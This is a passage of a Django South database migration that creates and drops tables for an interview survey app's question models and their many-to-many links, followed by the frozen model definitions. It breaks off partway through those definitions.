    db.create_table(u'analisis_pregunta_3', (
        pk(),
        ('entrevistado', fk('analisis.Entrevista')),
    ))
    db.send_create_signal(u'analisis', ['Pregunta_3'])
    m2m(u'analisis_pregunta_3_grupo',
        'pregunta_3', u'analisis.pregunta_3', 'grupo', u'configuracion.grupo')

    # Pregunta_4 plus its grupo_beneficiario / tema M2M tables.
    db.create_table(u'analisis_pregunta_4', (
        pk(),
        ('impacto', char(250)),
        ('entrevistado', fk('analisis.Entrevista')),
    ))
    db.send_create_signal(u'analisis', ['Pregunta_4'])
    m2m(u'analisis_pregunta_4_grupo_beneficiario',
        'pregunta_4', u'analisis.pregunta_4', 'grupo', u'configuracion.grupo')
    m2m(u'analisis_pregunta_4_tema',
        'pregunta_4', u'analisis.pregunta_4', 'tema', u'configuracion.tema')

    # Pregunta_5a plus its ubicacion / socio / tema M2M tables.
    db.create_table(u'analisis_pregunta_5a', (
        pk(),
        ('innovacion', char(250)),
        ('prioritizado', intf()),
        ('entrevistado', fk('analisis.Entrevista')),
    ))
    db.send_create_signal(u'analisis', ['Pregunta_5a'])
    m2m(u'analisis_pregunta_5a_ubicacion',
        'pregunta_5a', u'analisis.pregunta_5a', 'municipio', u'lugar.municipio')
    m2m(u'analisis_pregunta_5a_socio',
        'pregunta_5a', u'analisis.pregunta_5a', 'organizaciones', u'mapeo.organizaciones')
    m2m(u'analisis_pregunta_5a_tema',
        'pregunta_5a', u'analisis.pregunta_5a', 'tema', u'configuracion.tema')

    # Pregunta_5c plus its papel_1 M2M table.
    db.create_table(u'analisis_pregunta_5c', (
        pk(),
        ('innovacion', fk('analisis.Pregunta_5a')),
        ('organizacion', fk('mapeo.Organizaciones')),
        ('entrevistado', fk('analisis.Entrevista')),
    ))
    db.send_create_signal(u'analisis', ['Pregunta_5c'])
    m2m(u'analisis_pregunta_5c_papel_1',
        'pregunta_5c', u'analisis.pregunta_5c', 'papel', u'configuracion.papel')

    # Pregunta_5d plus its categoria M2M table.
    db.create_table(u'analisis_pregunta_5d', (
        pk(),
        ('innovacion', fk('analisis.Pregunta_5a')),
        ('entrevistado', fk('analisis.Entrevista')),
    ))
    db.send_create_signal(u'analisis', ['Pregunta_5d'])
    m2m(u'analisis_pregunta_5d_categoria',
        'pregunta_5d', u'analisis.pregunta_5d', 'categoria', u'configuracion.categoria')

    # Pregunta_5e plus its categoria_fuente M2M table.
    db.create_table(u'analisis_pregunta_5e', (
        pk(),
        ('innovacion', fk('analisis.Pregunta_5a')),
        ('fuente', char(200)),
        ('entrevistado', fk('analisis.Entrevista')),
    ))
    db.send_create_signal(u'analisis', ['Pregunta_5e'])
    m2m(u'analisis_pregunta_5e_categoria_fuente',
        'pregunta_5e', u'analisis.pregunta_5e',
        'categoria_fuente', u'configuracion.categoria_fuente')

    # Pregunta_6a plus its ubicacion / tema M2M tables.
    db.create_table(u'analisis_pregunta_6a', (
        pk(),
        ('innovacion', char(200)),
        ('prioritizado', intf()),
        ('entrevistado', fk('analisis.Entrevista')),
    ))
    db.send_create_signal(u'analisis', ['Pregunta_6a'])
    m2m(u'analisis_pregunta_6a_ubicacion',
        'pregunta_6a', u'analisis.pregunta_6a', 'municipio', u'lugar.municipio')
    m2m(u'analisis_pregunta_6a_tema',
        'pregunta_6a', u'analisis.pregunta_6a', 'tema', u'configuracion.tema')

    # Pregunta_6c plus its papel M2M table.
    db.create_table(u'analisis_pregunta_6c', (
        pk(),
        ('innovacion', fk('analisis.Pregunta_6a')),
        ('organizacion', fk('mapeo.Organizaciones')),
        ('entrevistado', fk('analisis.Entrevista')),
    ))
    db.send_create_signal(u'analisis', ['Pregunta_6c'])
    m2m(u'analisis_pregunta_6c_papel',
        'pregunta_6c', u'analisis.pregunta_6c', 'papel', u'configuracion.papel')

    # Pregunta_6d plus its categoria M2M table.
    db.create_table(u'analisis_pregunta_6d', (
        pk(),
        ('innovacion', fk('analisis.Pregunta_6a')),
        ('entrevistado', fk('analisis.Entrevista')),
    ))
    db.send_create_signal(u'analisis', ['Pregunta_6d'])
    m2m(u'analisis_pregunta_6d_categoria',
        'pregunta_6d', u'analisis.pregunta_6d', 'categoria', u'configuracion.categoria')

    # Pregunta_6e plus its categoria_conocimient M2M table.
    # NOTE: 'conocimient' / 'categoria_innovacio' match the (truncated)
    # model field names as frozen in the original migration.
    db.create_table(u'analisis_pregunta_6e', (
        pk(),
        ('innovacion', fk('analisis.Pregunta_6a')),
        ('conocimient', char(200)),
        ('categoria_innovacio', fk('configuracion.Categoria_Innovacion')),
        ('entrevistado', fk('analisis.Entrevista')),
    ))
    db.send_create_signal(u'analisis', ['Pregunta_6e'])
    m2m(u'analisis_pregunta_6e_categoria_conocimient',
        'pregunta_6e', u'analisis.pregunta_6e',
        'categoria_conocimiento', u'configuracion.categoria_conocimiento')

    # Pregunta_7a plus its ubicacion / seleccion M2M tables.
    db.create_table(u'analisis_pregunta_7a', (
        pk(),
        ('entrevistado', fk('analisis.Entrevista')),
    ))
    db.send_create_signal(u'analisis', ['Pregunta_7a'])
    m2m(u'analisis_pregunta_7a_ubicacion',
        'pregunta_7a', u'analisis.pregunta_7a', 'municipio', u'lugar.municipio')
    m2m(u'analisis_pregunta_7a_seleccion',
        'pregunta_7a', u'analisis.pregunta_7a', 'seleccion_7a', u'configuracion.seleccion_7a')

    # Pregunta_7b plus its seleccion M2M table.
    db.create_table(u'analisis_pregunta_7b', (
        pk(),
        ('entrevistado', fk('analisis.Entrevista')),
    ))
    db.send_create_signal(u'analisis', ['Pregunta_7b'])
    m2m(u'analisis_pregunta_7b_seleccion',
        'pregunta_7b', u'analisis.pregunta_7b', 'seleccion_7b', u'configuracion.seleccion_7b')

    # Pregunta_8 plus its tema M2M table (note: links to Tema_Relacion).
    db.create_table(u'analisis_pregunta_8', (
        pk(),
        ('organizacion', fk('mapeo.Organizaciones')),
        ('territorio1', intf()),
        ('periodo1', intf()),
        ('profundidad1', intf()),
        ('entrevistado', fk('analisis.Entrevista')),
    ))
    db.send_create_signal(u'analisis', ['Pregunta_8'])
    m2m(u'analisis_pregunta_8_tema',
        'pregunta_8', u'analisis.pregunta_8', 'tema_relacion', u'configuracion.tema_relacion')

    # Pregunta_9 (plain integer answers, no M2M tables).
    db.create_table(u'analisis_pregunta_9', (
        pk(),
        ('tema', intf()),
        ('prioridad1', intf()),
        ('papel1', intf()),
        ('conocimiento', intf()),
        ('experiencia', intf()),
        ('entrevistado', fk('analisis.Entrevista')),
    ))
    db.send_create_signal(u'analisis', ['Pregunta_9'])

    # Pregunta_11 (plain integer answers, no M2M tables).
    db.create_table(u'analisis_pregunta_11', (
        pk(),
        ('sobre', intf()),
        ('tipo_estudio1', intf()),
        ('calendario', intf()),
        ('disponibilidad1', intf()),
        ('entrevistado', fk('analisis.Entrevista')),
    ))
    db.send_create_signal(u'analisis', ['Pregunta_11'])
def backwards(self, orm):
# Deleting model 'Entrevista'
db.delete_table(u'analisis_entrevista')
# Removing M2M table for field departamento on 'Entrevista'
db.delete_table(db.shorten_name(u'analisis_entrevista_departamento'))
# Deleting model 'Pregunta_1'
db.delete_table(u'analisis_pregunta_1')
# Removing M2M table for field ubicacion on 'Pregunta_1'
db.delete_table(db.shorten_name(u'analisis_pregunta_1_ubicacion'))
# Removing M2M table for field socio on 'Pregunta_1'
db.delete_table(db.shorten_name(u'analisis_pregunta_1_socio'))
# Removing M2M table for field tema on 'Pregunta_1'
db.delete_table(db.shorten_name(u'analisis_pregunta_1_tema'))
# Deleting model 'Pregunta_2'
db.delete_table(u'analisis_pregunta_2')
# Deleting model 'Pregunta_3'
db.delete_table(u'analisis_pregunta_3')
# Removing M2M table for field grupo on 'Pregunta_3'
db.delete_table(db.shorten_name(u'analisis_pregunta_3_grupo'))
# Deleting model 'Pregunta_4'
db.delete_table(u'analisis_pregunta_4')
# Removing M2M table for field grupo_beneficiario on 'Pregunta_4'
db.delete_table(db.shorten_name(u'analisis_pregunta_4_grupo_beneficiario'))
# Removing M2M table for field tema on 'Pregunta_4'
db.delete_table(db.shorten_name(u'analisis_pregunta_4_tema'))
# Deleting model 'Pregunta_5a'
db.delete_table(u'analisis_pregunta_5a')
# Removing M2M table for field ubicacion on 'Pregunta_5a'
db.delete_table(db.shorten_name(u'analisis_pregunta_5a_ubicacion'))
# Removing M2M table for field socio on 'Pregunta_5a'
db.delete_table(db.shorten_name(u'analisis_pregunta_5a_socio'))
# Removing M2M table for field tema on 'Pregunta_5a'
db.delete_table(db.shorten_name(u'analisis_pregunta_5a_tema'))
# Deleting model 'Pregunta_5c'
db.delete_table(u'analisis_pregunta_5c')
# Removing M2M table for field papel_1 on 'Pregunta_5c'
db.delete_table(db.shorten_name(u'analisis_pregunta_5c_papel_1'))
# Deleting model 'Pregunta_5d'
db.delete_table(u'analisis_pregunta_5d')
# Removing M2M table for field categoria on 'Pregunta_5d'
db.delete_table(db.shorten_name(u'analisis_pregunta_5d_categoria'))
# Deleting model 'Pregunta_5e'
db.delete_table(u'analisis_pregunta_5e')
# Removing M2M table for field categoria_fuente on 'Pregunta_5e'
db.delete_table(db.shorten_name(u'analisis_pregunta_5e_categoria_fuente'))
# Deleting model 'Pregunta_6a'
db.delete_table(u'analisis_pregunta_6a')
# Removing M2M table for field ubicacion on 'Pregunta_6a'
db.delete_table(db.shorten_name(u'analisis_pregunta_6a_ubicacion'))
# Removing M2M table for field tema on 'Pregunta_6a'
db.delete_table(db.shorten_name(u'analisis_pregunta_6a_tema'))
# Deleting model 'Pregunta_6c'
db.delete_table(u'analisis_pregunta_6c')
# Removing M2M table for field papel on 'Pregunta_6c'
db.delete_table(db.shorten_name(u'analisis_pregunta_6c_papel'))
# Deleting model 'Pregunta_6d'
db.delete_table(u'analisis_pregunta_6d')
# Removing M2M table for field categoria on 'Pregunta_6d'
db.delete_table(db.shorten_name(u'analisis_pregunta_6d_categoria'))
# Deleting model 'Pregunta_6e'
db.delete_table(u'analisis_pregunta_6e')
# Removing M2M table for field categoria_conocimient on 'Pregunta_6e'
db.delete_table(db.shorten_name(u'analisis_pregunta_6e_categoria_conocimient'))
# Deleting model 'Pregunta_7a'
db.delete_table(u'analisis_pregunta_7a')
# Removing M2M table for field ubicacion on 'Pregunta_7a'
db.delete_table(db.shorten_name(u'analisis_pregunta_7a_ubicacion'))
# Removing M2M table for field seleccion on 'Pregunta_7a'
db.delete_table(db.shorten_name(u'analisis_pregunta_7a_seleccion'))
# Deleting model 'Pregunta_7b'
db.delete_table(u'analisis_pregunta_7b')
# Removing M2M table for field seleccion on 'Pregunta_7b'
db.delete_table(db.shorten_name(u'analisis_pregunta_7b_seleccion'))
# Deleting model 'Pregunta_8'
db.delete_table(u'analisis_pregunta_8')
# Removing M2M table for field tema on 'Pregunta_8'
db.delete_table(db.shorten_name(u'analisis_pregunta_8_tema'))
# Deleting model 'Pregunta_9'
db.delete_table(u'analisis_pregunta_9')
# Deleting model 'Pregunta_11'
db.delete_table(u'analisis_pregunta_11')
models = {
u'analisis.entrevista': {
'Meta': {'object_name': 'Entrevista'},
'alcance1': ('django.db.models.fields.IntegerField', [], {}),
'departamento': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['lugar.Departamento']", 'symmetrical': 'False'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'fecha': ('django.db.models.fields.DateField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'organizacion': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['mapeo.Organizaciones']"}),
'pais': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['lugar.Pais']"}),
'posicion': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'telefono': ('django.db.models.fields.IntegerField', [], {}),
'tipo_estudio': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['configuracion.Tipo_Estudio']"}),
'usuario': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'analisis.pregunta_1': {
'Meta': {'object_name': 'Pregunta_1'},
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
'estado1': ('django.db.models.fields.IntegerField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'proyecto': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'socio': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['mapeo.Organizaciones']", 'symmetrical': 'False'}),
'tema': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['configuracion.Tema']", 'symmetrical': 'False'}),
'ubicacion': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['lugar.Municipio']", 'symmetrical': 'False'})
},
u'analisis.pregunta_11': {
'Meta': {'object_name': 'Pregunta_11'},
'calendario': ('django.db.models.fields.IntegerField', [], {}),
'disponibilidad1': ('django.db.models.fields.IntegerField', [], {}),
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sobre': ('django.db.models.fields.IntegerField', [], {}),
'tipo_estudio1': ('django.db.models.fields.IntegerField', [], {})
},
u'analisis.pregunta_2': {
'Meta': {'object_name': 'Pregunta_2'},
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
'hombre': ('django.db.models.fields.IntegerField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mujer': ('django.db.models.fields.IntegerField', [], {}),
'seleccion1': ('django.db.models.fields.IntegerField', [], {})
},
u'analisis.pregunta_3': {
'Meta': {'object_name': 'Pregunta_3'},
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
'grupo': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['configuracion.Grupo']", 'symmetrical': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'analisis.pregunta_4': {
'Meta': {'object_name': 'Pregunta_4'},
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
'grupo_beneficiario': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['configuracion.Grupo']", 'symmetrical': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'impacto': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'tema': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['configuracion.Tema']", 'symmetrical': 'False'})
},
u'analisis.pregunta_5a': {
'Meta': {'object_name': 'Pregunta_5a'},
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'innovacion': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'prioritizado': ('django.db.models.fields.IntegerField', [], {}),
'socio': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['mapeo.Organizaciones']", 'symmetrical': 'False'}),
'tema': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['configuracion.Tema']", 'symmetrical': 'False'}),
'ubicacion': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['lugar.Municipio']", 'symmetrical': 'False'})
},
u'analisis.pregunta_5c': {
'Meta': {'object_name': 'Pregunta_5c'},
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'innovacion': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Pregunta_5a']"}),
'organizacion': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['mapeo.Organizaciones']"}),
'papel_1': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['configuracion.Papel']", 'symmetrical': 'False'})
},
u'analisis.pregunta_5d': {
'Meta': {'object_name': 'Pregunta_5d'},
'categoria': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['configuracion.Categoria']", 'symmetrical': 'False'}),
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'innovacion': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Pregunta_5a']"})
},
u'analisis.pregunta_5e': {
'Meta': {'object_name': 'Pregunta_5e'},
'categoria_fuente': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['configuracion.Categoria_Fuente']", 'symmetrical': 'False'}),
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
'fuente': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'innovacion': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Pregunta_5a']"})
},
u'analisis.pregunta_6a': {
'Meta': {'object_name': 'Pregunta_6a'},
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'innovacion': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'prioritizado': ('django.db.models.fields.IntegerField', [], {}),
'tema': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['configuracion.Tema']", 'symmetrical': 'False'}),
'ubicacion': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['lugar.Municipio']", 'symmetrical': 'False'})
},
u'analisis.pregunta_6c': {
'Meta': {'object_name': 'Pregunta_6c'},
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'innovacion': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Pregunta_6a']"}),
'organizacion': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['mapeo.Organizaciones']"}),
'papel': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['configuracion.Papel']", 'symmetrical': 'False'})
},
u'analisis.pregunta_6d': {
'Meta': {'object_name': 'Pregunta_6d'},
'categoria': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['configuracion.Categoria']", 'symmetrical': 'False'}),
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'innovacion': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Pregunta_6a']"})
},
u'analisis.pregunta_6e': {
'Meta': {'object_name': 'Pregunta_6e'},
'categoria_conocimient': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['configuracion.Categoria_Conocimiento']", 'symmetrical': 'False'}),
'categoria_innovacio': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['configuracion.Categoria_Innovacion']"}),
'conocimient': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'innovacion': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Pregunta_6a']"})
},
u'analisis.pregunta_7a': {
'Meta': {'object_name': 'Pregunta_7a'},
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'seleccion': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['configuracion.Seleccion_7a']", 'symmetrical': 'False'}),
'ubicacion': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['lugar.Municipio']", 'symmetrical': 'False'})
},
u'analisis.pregunta_7b': {
'Meta': {'object_name': 'Pregunta_7b'},
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'seleccion': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['configuracion.Seleccion_7b']", 'symmetrical': 'False'})
},
u'analisis.pregunta_8': {
'Meta': {'object_name': 'Pregunta_8'},
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'organizacion': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['mapeo.Organizaciones']"}),
'periodo1': ('django.db.models.fields.IntegerField', [], {}),
'profundidad1': ('django.db.models.fields.IntegerField', [], {}),
'tema': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['configuracion.Tema_Relacion']", 'symmetrical': 'False'}),
'territorio1': ('django.db.models.fields.IntegerField', [], {})
},
u'analisis.pregunta_9': {
'Meta': {'object_name': 'Pregunta_9'},
'conocimiento': ('django.db.models.fields.IntegerField', [], {}),
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
'experiencia': ('django.db.models.fields.IntegerField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'papel1': ('django.db.models.fields.IntegerField', [], {}),
'prioridad1': ('django.db.models.fields.IntegerField', [], {}),
'tema': ('django.db.models.fields.IntegerField', [], {})
},
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'configuracion.areaaccion': {
'Meta': {'object_name': 'AreaAccion'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'configuracion.categoria': {
'Meta': {'object_name': 'Categoria'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'configuracion.categoria_conocimiento': {
'Meta': {'object_name': 'Categoria_Conocimiento'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'configuracion.categoria_fuente': {
'Meta': {'object_name': 'Categoria_Fuente'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'configuracion.categoria_innovacion': {
'Meta': {'object_name': 'Categoria_Innovacion'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'configuracion.grupo': {
'Meta': {'object_name': 'Grupo'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'configuracion.papel': {
'Meta': {'object_name': 'Papel'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'configuracion.plataforma': {
'Meta': {'object_name': 'Plataforma'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'sitio_accion': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['configuracion.SitioAccion']"})
},
u'configuracion.sector': {
'Meta': {'object_name': 'Sector'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'configuracion.seleccion_7a': {
'Meta': {'object_name': 'Seleccion_7a'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'configuracion.seleccion_7b': {
'Meta': {'object_name': 'Seleccion_7b'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'configuracion.sitioaccion': {
'Meta': {'object_name': 'SitioAccion'},
'area_accion': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['configuracion.AreaAccion']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'configuracion.tema': {
'Meta': {'object_name': 'Tema'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'tema': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'configuracion.tema_relacion': {
'Meta': {'object_name': 'Tema_Relacion'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'configuracion.tipo_estudio': {
'Meta': {'object_name': 'Tipo_Estudio'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'lugar.departamento': {
'Meta': {'ordering': "['nombre']", 'object_name': 'Departamento'},
'extension': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
'id': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}),
'pais': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['lugar.Pais']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'unique': 'True', 'null': 'True'})
},
u'lugar.municipio': {
'Meta': {'ordering': "['departamento__nombre', 'nombre']", 'object_name': 'Municipio'},
'departamento': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['lugar.Departamento']"}),
'extension': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
'id': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True'}),
'latitud': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '8', 'decimal_places': '5', 'blank': 'True'}),
'longitud': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '8', 'decimal_places': '5', 'blank': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'unique': 'True', 'null': 'True'})
},
u'lugar.pais': {
'Meta': {'object_name': 'Pais'},
'codigo': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'mapeo.organizaciones': {
'Meta': {'ordering': "[u'nombre']", 'unique_together': "((u'font_color', u'nombre'),)", 'object_name': 'Organizaciones'},
'area_accion': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['configuracion.AreaAccion']"}),
'contacto': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'correo_electronico': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
